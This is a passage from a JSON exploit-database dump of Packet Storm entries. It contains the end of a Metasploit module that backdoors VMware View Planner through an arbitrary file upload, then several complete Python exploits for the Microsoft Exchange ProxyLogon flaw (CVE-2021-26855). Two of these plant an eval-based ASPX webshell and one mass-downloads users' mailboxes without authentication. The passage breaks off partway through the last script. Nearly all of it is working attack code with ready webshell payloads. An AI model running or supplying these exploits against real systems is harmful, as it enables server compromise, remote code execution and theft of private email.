'log_upload_wsgi.py') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nunless res.code == 200 && !res.body.empty? \nreturn CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.') \nend \n \n@original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration. \n \nif res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode(\"utf8\")).hexdigest()==secret_key:') \nreturn CheckCode::Safe(\"Target's log_upload_wsgi.py file has been patched.\") \nend \n \nCheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!') \nend \n \n# We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file. 
\n# As the code for both is the same, minus the content of the file, this is a generic function to handle that. \ndef upload_file(content) \nmime = Rex::MIME::Message.new \nmime.add_part(content, 'application/octet-stream', nil, \"form-data; name=\\\"logfile\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(20)}\\\"\") \nmime.add_part('{\"itrLogPath\":\"/etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}', nil, nil, 'form-data; name=\"logMetaData\"') \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'logupload'), \n'ctype' => \"multipart/form-data; boundary=#{mime.bound}\", \n'data' => mime.to_s \n) \nunless res.to_s.include?('File uploaded successfully.') \nfail_with(Failure::UnexpectedReply, \"Target indicated that the file wasn't uploaded successfully!\") \nend \nend \n \ndef exploit \n# Here we want to grab our template file, taken from a clean install but \n# with a backdoor section added to it, and then fill in the PAYLOAD placeholder \n# with the payload we want to execute. \ndata_dir = File.join(Msf::Config.data_directory, 'exploits', shortname) \nfile_content = File.read(File.join(data_dir, 'log_upload_wsgi.py')) \n \npayload.encoded.gsub!(/\"/, '\\\\\"') \nfile_content['PAYLOAD'] = payload.encoded \n \n# Now that things are primed, upload the file to the target. \nprint_status('Uploading backdoor to system via the arbitrary file upload vulnerability!') \nupload_file(file_content) \nprint_good('Backdoor uploaded!') \n \n# Use the OPTIONS request to trigger the backdoor. Technically this \n# could be any other method including invalid ones like BACKDOOR, but for \n# the purposes of stealth lets use a legitimate one. 
\nprint_status('Sending request to execute the backdoor!') \nsend_request_cgi( \n'method' => 'OPTIONS', \n'uri' => normalize_uri(target_uri.path, 'logupload') \n) \nensure \n# At this point we should have our shell after waiting a few seconds, \n# so lets now restore the original file so we don't leave anything behind. \nprint_status('Reuploading the original code to remove the backdoor!') \nupload_file(@original_content) \nprint_good('Original file restored, enjoy the shell!') \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161879/vmware_view_planner_4_6_uploadlog_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-15T21:46:57", "description": "", "cvss3": {}, "published": "2021-03-11T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange Proxylogon SSRF Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-11T00:00:00", "id": "PACKETSTORM:161806", "href": "https://packetstormsecurity.com/files/161806/Microsoft-Exchange-Proxylogon-SSRF-Proof-Of-Concept.html", "sourceData": "`# Original Author: testanull https://github.com/testanull https://twitter.com/testanull \n# PoC of proxylogon chain SSRF(CVE-2021-26855) to write file \n# Original \"Archive\" https://web.archive.org/web/20210310164403/https://gist.github.com/testanull/fabd8eeb46f120c4b15f8793617ca7d1 \n \nimport requests \nfrom urllib3.exceptions import InsecureRequestWarning \nimport random \nimport string \nimport sys \n \n \ndef id_generator(size=6, chars=string.ascii_lowercase + string.digits): \nreturn ''.join(random.choice(chars) for _ in range(size)) \n \nif len(sys.argv) < 2: \nprint(\"Usage: python PoC.py <target> <email>\") \nprint(\"Example: python PoC.py mail.evil.corp haxor@evil.corp\") \nexit() \nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) \ntarget = sys.argv[1] \nemail = sys.argv[2] \nrandom_name = id_generator(3) + 
\".js\" \nuser_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\" \n \nshell_path = \"Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\ahihi.aspx\" \nshell_absolute_path = \"\\\\\\\\127.0.0.1\\\\c$\\\\%s\" % shell_path \n \nshell_content = '<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"exec_code\"],\"unsafe\");}</script>' \nlegacyDnPatchByte = \"68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a\" \nautoDiscoverBody = \"\"\"<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \n\"\"\" % email \n \nprint(\"Attacking target \" + target) \nprint(\"=============================\") \nprint(legacyDnPatchByte.decode('hex')) \nFQDN = \"EXCHANGE\" \nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\"Cookie\": \"X-BEResource=localhost~1942062522\", \n\"User-Agent\": user_agent}, \nverify=False) \nif \"X-CalculatedBETarget\" in ct.headers and \"X-FEServer\" in ct.headers: \nFQDN = ct.headers[\"X-FEServer\"] \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": user_agent}, \ndata=autoDiscoverBody, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Autodiscover Error!\") \nexit() \nif \"<LegacyDN>\" not in ct.content: \nprint(\"Can not get LegacyDN!\") \nexit() \n \nlegacyDn = ct.content.split(\"<LegacyDN>\")[1].split(\"</LegacyDN>\")[0] \nprint(\"Got DN: \" + legacyDn) \n \nmapi_body = legacyDn + 
\"\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;\" % FQDN, \n\"Content-Type\": \"application/mapi-http\", \n\"User-Agent\": user_agent \n}, \ndata=mapi_body, \nverify=False \n) \nif ct.status_code != 200 or \"act as owner of a UserMailbox\" not in ct.content: \nprint(\"Mapi Error!\") \nexit() \n \nsid = ct.content.split(\"with SID \")[1].split(\" and MasterAccountSid\")[0] \n \nprint(\"Got SID: \" + sid) \n \nproxyLogon_request = \"\"\"<r at=\"Negotiate\" ln=\"john\"><s>%s</s><s a=\"7\" t=\"1\">S-1-1-0</s><s a=\"7\" t=\"1\">S-1-5-2</s><s a=\"7\" t=\"1\">S-1-5-11</s><s a=\"7\" t=\"1\">S-1-5-15</s><s a=\"3221225479\" t=\"1\">S-1-5-5-0-6948923</s></r> \n\"\"\" % sid \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/proxyLogon.ecp?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": user_agent \n}, \ndata=proxyLogon_request, \nverify=False \n) \nif ct.status_code != 241 or not \"set-cookie\" in ct.headers: \nprint(\"Proxylogon Error!\") \nexit() \n \nsess_id = ct.headers['set-cookie'].split(\"ASP.NET_SessionId=\")[1].split(\";\")[0] \n \nmsExchEcpCanary = ct.headers['set-cookie'].split(\"msExchEcpCanary=\")[1].split(\";\")[0] \nprint(\"Got session id: \" + sess_id) \nprint(\"Got canary: \" + msExchEcpCanary) \n \nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, sess_id, msExchEcpCanary), \n\"User-Agent\": user_agent \n}, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Wrong canary!\") \nprint(\"Sometime we can skip this ...\") \nrbacRole = 
ct.content.split(\"RBAC roles:</span> <span class='diagTxt'>\")[1].split(\"</span>\")[0] \n# print \"Got rbacRole: \"+ rbacRole \n \nprint(\"=========== It means good to go!!!====\") \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n \n}, \njson={\"filter\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"SelectedView\": \"\", \"SelectedVDirType\": \"All\"}}, \"sort\": {}}, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"GetOAB Error!\") \nexit() \noabId = ct.content.split('\"RawIdentity\":\"')[1].split('\"')[0] \nprint(\"Got OAB id: \" + oabId) \n \noab_json = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"ExternalUrl\": \"http://ffff/#%s\" % shell_content}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=oab_json, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Set external url Error!\") \nexit() \n \nreset_oab_body = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": 
\"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"FilePathName\": shell_absolute_path}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=reset_oab_body, \nverify=False \n) \n \nif ct.status_code != 200: \nprint(\"Write Shell Error!\") \nexit() \n \nprint(\"Successful!\") \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161806/PoC_proxyLogon.py.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-18T15:56:31", "description": "", "cvss3": {}, "published": "2021-05-18T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange 2019 Unauthenticated Email Download", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855"], "modified": "2021-05-18T00:00:00", "id": "PACKETSTORM:162610", "href": "https://packetstormsecurity.com/files/162610/Microsoft-Exchange-2019-Unauthenticated-Email-Download.html", "sourceData": "`# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download \n# Date: 03-11-2021 \n# Exploit Author: Gonzalo Villegas a.k.a Cl34r \n# Vendor Homepage: https://www.microsoft.com/ \n# Version: OWA Exchange 2013 - 2019 \n# Tested on: OWA 2016 \n# CVE : CVE-2021-26855 \n# Details: checking users mailboxes and automated downloads of emails \n \nimport requests \nimport argparse \nimport time \n \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \n \n__proxies__ = {\"http\": \"http://127.0.0.1:8080\", \n\"https\": \"https://127.0.0.1:8080\"} # for debug on proxy \n \n \n# needs to specifies 
mailbox, will return folder Id if account exists \npayload_get_folder_id = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:GetFolder> \n<m:FolderShape> \n<t:BaseShape>AllProperties</t:BaseShape> \n</m:FolderShape> \n<m:FolderIds> \n<t:DistinguishedFolderId Id=\"inbox\"> \n<t:Mailbox> \n<t:EmailAddress>{}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:FolderIds> \n</m:GetFolder> \n</soap:Body> \n</soap:Envelope> \n \n\"\"\" \n# needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails) \npayload_get_items_id_folder = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:FindItem Traversal=\"Shallow\"> \n<m:ItemShape> \n<BaseShape>AllProperties</BaseShape></m:ItemShape> \n<SortOrder/> \n<m:ParentFolderIds> \n<t:FolderId Id=\"{}\" ChangeKey=\"{}\"/> \n</m:ParentFolderIds> \n<QueryString/> \n</m:FindItem> \n</soap:Body> \n</soap:Envelope> \n\"\"\" \n \n# needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox \npayload_get_mail = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<GetItem 
xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" Traversal=\"Shallow\"> \n<ItemShape> \n<t:BaseShape>Default</t:BaseShape> \n</ItemShape> \n<ItemIds> \n<t:ItemId Id=\"{}\" ChangeKey=\"{}\"/> \n</ItemIds> \n</GetItem> \n</soap:Body> \n</soap:Envelope> \n\"\"\" \n \n \ndef getFQDN(url): \nprint(\"[*] Getting FQDN from headers\") \nrs = requests.post(url + \"/owa/auth.owa\", verify=False, data=\"evildata\") \nif \"X-FEServer\" in rs.headers: \nreturn rs.headers[\"X-FEServer\"] \nelse: \nprint(\"[-] Can't get FQDN \") \nexit(0) \n \n \ndef extractEmail(url, uri, user, fqdn, content_folderid, path): \nheaders = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn), \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": \"Mozilla pwner\"} \nfrom xml.etree import ElementTree as ET \ndom = ET.fromstring(content_folderid) \nfor p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'): \nid_folder = p[0].attrib.get(\"Id\") \nchange_key_folder = p[0].attrib.get(\"ChangeKey\") \ndata = payload_get_items_id_folder.format(id_folder, change_key_folder) \nrandom_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"] \nrs = requests.post(url + uri, data=data, headers=headers, verify=False) \nif \"ErrorAccessDenied\" in rs.text: \nprint(\"[*] Denied ;(.. 
retrying\") \nt_uri = uri.split(\"/\")[-1] \nfor ru in random_uris: \nprint(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru))) \nrs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False) \nif \"NoError\" in rs.text: \nprint(\"[+] data found, dowloading email\") \nbreak \nprint(\"[+]Getting mails...\") \ndom_messages = ET.fromstring(rs.text) \nmessages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items') \nfor m in messages: \nid_message = m[0].attrib.get(\"Id\") \nchange_key_message = m[0].attrib.get(\"ChangeKey\") \ndata = payload_get_mail.format(id_message, change_key_message) \nrandom_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"] \nrs = requests.post(url + uri, data=data, headers=headers, verify=False) \nif \"ErrorAccessDenied\" in rs.text: \nprint(\"[*] Denied ;(.. retrying\") \nt_uri = uri.split(\"/\")[-1] \nfor ru in random_uris: \nprint(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru))) \nrs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False) \nif \"NoError\" in rs.text: \nprint(\"[+] data found, downloading email\") \nbreak \n \ntry: \nf = open(path + \"/\" + user.replace(\"@\", \"_\").replace(\".\", \"_\")+\"_\"+change_key_message.replace(\"/\", \"\").replace(\"\\\\\", \"\")+\".xml\", 'w+') \nf.write(rs.text) \nf.close() \nexcept Exception as e: \nprint(\"[!] 
Can't write .xml file to path (email): \", e) \n \n \ndef checkURI(url, fqdn): \nheaders = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn), \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": \"Mozilla hehe\"} \narr_uri = [\"//ecp/xxx.js\", \"/ecp/favicon.ico\", \"/ecp/auth.js\"] \nfor uri in arr_uri: \nrs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(\"thisisnotanvalidmail@pwn.local\"), \nheaders=headers) \n#print(rs.content) \nif rs.status_code == 200 and \"MessageText\" in rs.text: \nprint(\"[+] Valid URI:\", uri) \ncalculated_domain = rs.headers[\"X-CalculatedBETarget\"].split(\".\") \nif calculated_domain[-2] in (\"com\", \"gov\", \"gob\", \"edu\", \"org\"): \ncalculated_domain = calculated_domain[-3] + \".\" + calculated_domain[-2] + \".\" + calculated_domain[-1] \nelse: \ncalculated_domain = calculated_domain[-2] + \".\" + calculated_domain[-1] \nreturn uri, calculated_domain \n#time.sleep(1) \nprint(\"[-] No valid URI found ;(\") \nexit(0) \n \n \ndef checkEmailBoxes(url, uri, user, fqdn, path): \nheaders = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn), \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": \"Mozilla hehe\"} \nrs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user), \nheaders=headers) \n#time.sleep(1) \n#print(rs.content) \nif \"ResponseCode\" in rs.text and \"ErrorAccessDenied\" in rs.text: \nprint(\"[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable\".format(user)) \nif \"ResponseCode\" in rs.text and \"NoError\" in rs.text: \nprint(\"[+] Valid Email Found!: {}\".format(user)) \nextractEmail(url, uri, user, fqdn, rs.text, path) \nif \"ResponseCode\" in rs.text and \"ErrorNonExistentMailbox\" in rs.text: \nprint(\"[-] Not Valid Email: {}\".format(user)) \n \n \ndef main(): \n__URL__ = None \n__FQDN__ = None \n__mailbox_domain__ = None \n__path__ = None \nprint(\"[***** OhhWAA *****]\") \nparser = 
argparse.ArgumentParser(usage=\"Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>\") \nparser.add_argument('-u', \"--url\", help=\"Url, provide schema and not final / (eg https://example.org)\", required=True) \nparser.add_argument('-l', \"--list\", help=\"Users mailbox list\", required=True) \nparser.add_argument(\"-p\", \"--path\", help=\"Path to write emails in xml format\", required=True) \nparser.add_argument('-f', \"--fqdn\", help=\"FQDN\", required=False, default=None) \nparser.add_argument(\"-d\", \"--domain\", help=\"Domain to check mailboxes (eg if .local dont work)\", required=False, default=None) \nargs = parser.parse_args() \n__URL__ = args.url \n__FQDN__ = args.fqdn \n__mailbox_domain__ = args.domain \n__list_users__ = args.list \n__valid_users__ = [] \n__path__ = args.path \nif not __FQDN__: \n__FQDN__ = getFQDN(__URL__) \nprint(\"[+] Got FQDN:\", __FQDN__) \n \nvalid_uri, calculated_domain = checkURI(__URL__, __FQDN__) \n \nif not __mailbox_domain__: \n__mailbox_domain__ = calculated_domain \n \nlist_users = open(__list_users__, \"r\") \nfor user in list_users: \ncheckEmailBoxes(__URL__, valid_uri, user.strip()+\"@\"+__mailbox_domain__, __FQDN__, __path__) \n \nprint(\"[!!!] 
FINISHED OhhWAA\") \n \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162610/msexchange2019-disclose.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:17:14", "description": "", "cvss3": {}, "published": "2021-03-18T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange 2019 SSRF / Arbitrary File Write ", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-18T00:00:00", "id": "PACKETSTORM:161846", "href": "https://packetstormsecurity.com/files/161846/Microsoft-Exchange-2019-SSRF-Arbitrary-File-Write.html", "sourceData": "`import requests \nfrom urllib3.exceptions import InsecureRequestWarning \nimport random \nimport string \nimport sys \n \n \ndef id_generator(size=6, chars=string.ascii_lowercase + string.digits): \nreturn ''.join(random.choice(chars) for _ in range(size)) \n \nif len(sys.argv) < 2: \nprint(\"\u4f7f\u7528\u65b9\u5f0f: python PoC.py <target> <email>\") \nprint(\"\u4f7f\u7528\u65b9\u5f0f: python PoC.py mail.btwaf.cn test2@btwaf.cn\") \nexit() \n \nproxies = {\"http\": \"http://127.0.0.1:8080\", \"https\": \"http://127.0.0.1:8080\"} \nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) \ntarget = sys.argv[1] \nemail = sys.argv[2] \nrandom_name = id_generator(4) + \".js\" \nuser_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\" \n \nshell_path = \"Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\test11.aspx\" \nshell_absolute_path = \"\\\\\\\\127.0.0.1\\\\c$\\\\%s\" % shell_path \n \n# webshell content \nshell_content = '<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"code\"],\"unsafe\");}</script>' \n \nautoDiscoverBody = \"\"\"<Autodiscover 
xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \n\"\"\" % email \n \nprint(\"\u6b63\u5728\u83b7\u53d6Exchange Server \" + target+\"\u6743\u9650\") \nprint(\"=============================\") \nFQDN = \"EXCHANGE01\" \nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\"Cookie\": \"X-BEResource=localhost~1942062522\", \n\"User-Agent\": user_agent}, \nverify=False,proxies=proxies) \n \nif \"X-CalculatedBETarget\" in ct.headers and \"X-FEServer\" in ct.headers: \nFQDN = ct.headers[\"X-FEServer\"] \n \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": user_agent}, \ndata=autoDiscoverBody, \nproxies=proxies, \nverify=False \n) \n \nif ct.status_code != 200: \nprint(ct.status_code) \nprint(\"Autodiscover Error!\") \nexit() \n \nif \"<LegacyDN>\" not in str(ct.content): \nprint(\"Can not get LegacyDN!\") \nexit() \n \nlegacyDn = str(ct.content).split(\"<LegacyDN>\")[1].split(r\"</LegacyDN>\")[0] \nprint(\"Got DN: \" + legacyDn) \n \nmapi_body = legacyDn + \"\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;\" % FQDN, \n\"Content-Type\": \"application/mapi-http\", \n\"X-Requesttype\": \"Connect\", \n\"X-Clientinfo\": \"{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}\", \n\"X-Clientapplication\": \"Outlook/15.0.4815.1002\", \n\"X-Requestid\": 
\"{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456\", \n\"User-Agent\": user_agent \n}, \ndata=mapi_body, \nverify=False, \nproxies=proxies \n) \nif ct.status_code != 200 or \"act as owner of a UserMailbox\" not in str(ct.content): \nprint(\"Mapi Error!\") \nexit() \n \nsid = str(ct.content).split(\"with SID \")[1].split(\" and MasterAccountSid\")[0] \n \nprint(\"Got SID: \" + sid) \nsid = sid.replace(sid.split(\"-\")[-1],\"500\") \n \nproxyLogon_request = \"\"\"<r at=\"Negotiate\" ln=\"john\"><s>%s</s><s a=\"7\" t=\"1\">S-1-1-0</s><s a=\"7\" t=\"1\">S-1-5-2</s><s a=\"7\" t=\"1\">S-1-5-11</s><s a=\"7\" t=\"1\">S-1-5-15</s><s a=\"3221225479\" t=\"1\">S-1-5-5-0-6948923</s></r> \n\"\"\" % sid \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"User-Agent\": user_agent \n}, \ndata=proxyLogon_request, \nproxies=proxies, \nverify=False \n) \nif ct.status_code != 241 or not \"set-cookie\" in ct.headers: \nprint(\"Proxylogon Error!\") \nexit() \n \nsess_id = ct.headers['set-cookie'].split(\"ASP.NET_SessionId=\")[1].split(\";\")[0] \n \nmsExchEcpCanary = ct.headers['set-cookie'].split(\"msExchEcpCanary=\")[1].split(\";\")[0] \nprint(\"Got session id: \" + sess_id) \nprint(\"Got canary: \" + msExchEcpCanary) \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; \", \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"User-Agent\": user_agent \n \n}, \njson={\"filter\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", 
\n\"SelectedView\": \"\", \"SelectedVDirType\": \"All\"}}, \"sort\": {}}, \nverify=False \n) \n \nif ct.status_code != 200: \nprint(\"GetOAB Error!\") \nexit() \noabId = str(ct.content).split('\"RawIdentity\":\"')[1].split('\"')[0] \nprint(\"Got OAB id: \" + oabId) \n \noab_json = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"ExternalUrl\": \"http://ffff/#%s\" % shell_content}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=oab_json, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Set external url Error!\") \nexit() \n \nreset_oab_body = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"FilePathName\": shell_absolute_path}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; 